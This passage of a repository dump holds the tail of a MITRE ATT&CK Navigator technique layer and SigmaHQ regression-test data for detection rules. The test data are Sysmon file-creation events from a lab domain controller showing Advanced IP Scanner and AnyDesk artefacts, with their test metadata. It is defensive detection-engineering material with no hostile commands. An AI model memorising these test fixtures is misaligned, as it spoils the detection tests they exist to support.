\"T1135\",\n      \"tactic\": \"discovery\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1185\",\n      \"tactic\": \"collection\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505.004\",\n      \"tactic\": \"persistence\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.006\",\n      \"tactic\": \"credential-access\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.013\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.013\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1137\",\n      \"tactic\": \"persistence\",\n      \"score\": 9,\n      \"color\": \"\",\n      
\"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1008\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1137.006\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1136.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.009\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.009\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1137.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1195\",\n      \"tactic\": \"initial-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n     
 \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.015\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.015\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1001.003\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1114.001\",\n      \"tactic\": \"collection\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1222\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1589.002\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.012\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.012\",\n      
\"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.012\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.010\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.010\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1125\",\n      \"tactic\": \"collection\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.009\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.009\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.008\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      
\"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.008\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.012\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": 
[],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.012\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1559.002\",\n      \"tactic\": \"execution\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.002\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1207\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1010\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": 
\"T1134.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1200\",\n      \"tactic\": \"initial-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557.003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557.003\",\n      \"tactic\": \"collection\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1091\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1091\",\n      \"tactic\": \"initial-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1590.002\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": 
\"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1499.001\",\n      \"tactic\": \"impact\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1176\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1595.001\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1559\",\n      \"tactic\": \"execution\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": 
[],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1090.004\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1598.002\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    }\n  ]\n}"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:36:29.111126Z\"\n        }\n      },\n      \"EventRecordID\": 18267,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:36:29.110\",\n      \"ProcessGuid\": \"5AA13A44-0D74-68FC-EB1D-000000004002\",\n      \"ProcessId\": 5624,\n      \"Image\": \"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\is-3C3LU.tmp\\\\Advanced_IP_Scanner_2.5.4594.1(1).tmp\",\n      \"TargetFilename\": \"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2\\\\platforms\\\\qwindows.dll\",\n      \"CreationUtcTime\": \"2025-10-24 10:44:35.897\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml",
    "content": "id: 48ff85e7-a8ae-43fd-8a8f-16ce51a92183\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: fed85bf9-e075-4280-9159-fbe8a023d6fa\n      title: Advanced IP Scanner - File Event\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:34:34.640670Z\"\n        }\n      },\n      \"EventRecordID\": 14961,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:34:34.634\",\n      \"ProcessGuid\": \"5AA13A44-0D08-68FC-DC1D-000000004002\",\n      \"ProcessId\": 7760,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\AnyDesk.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\AnyDesk\\\\service.conf.new\",\n      \"CreationUtcTime\": \"2025-10-24 23:34:32.457\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      
\"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:34:34.644616Z\"\n        }\n      },\n      \"EventRecordID\": 14963,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:34:34.634\",\n      \"ProcessGuid\": \"5AA13A44-0D08-68FC-DC1D-000000004002\",\n      \"ProcessId\": 7760,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\AnyDesk.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\AnyDesk\\\\service.conf~RF2d9c1fe.TMP\",\n      \"CreationUtcTime\": \"2025-10-24 23:34:34.634\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:34:34.649129Z\"\n        }\n      },\n      \"EventRecordID\": 14985,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": 
\"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:34:34.645\",\n      \"ProcessGuid\": \"5AA13A44-0D08-68FC-DD1D-000000004002\",\n      \"ProcessId\": 9612,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\AnyDesk.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf.new\",\n      \"CreationUtcTime\": \"2025-10-24 23:34:32.250\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:34:34.653476Z\"\n        }\n      },\n      \"EventRecordID\": 14988,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:34:34.645\",\n      \"ProcessGuid\": \"5AA13A44-0D08-68FC-DD1D-000000004002\",\n      \"ProcessId\": 9612,\n      \"Image\": 
\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\AnyDesk.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf~RF2d9c20d.TMP\",\n      \"CreationUtcTime\": \"2025-10-24 23:34:34.645\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:34:34.655191Z\"\n        }\n      },\n      \"EventRecordID\": 14990,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:34:34.645\",\n      \"ProcessGuid\": \"5AA13A44-0D08-68FC-DD1D-000000004002\",\n      \"ProcessId\": 9612,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\AnyDesk.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf.new\",\n      \"CreationUtcTime\": \"2025-10-24 23:34:32.250\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/info.yml",
    "content": "id: 0d7ff9a2-a55c-46c8-b878-4ec4ea8e91ae\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 0b9ad457-2554-44c1-82c2-d56a99c42377\n      title: Anydesk Temporary Artefact\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:36:53.996168Z\"\n        }\n      },\n      \"EventRecordID\": 19025,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:36:53.977\",\n      \"ProcessGuid\": 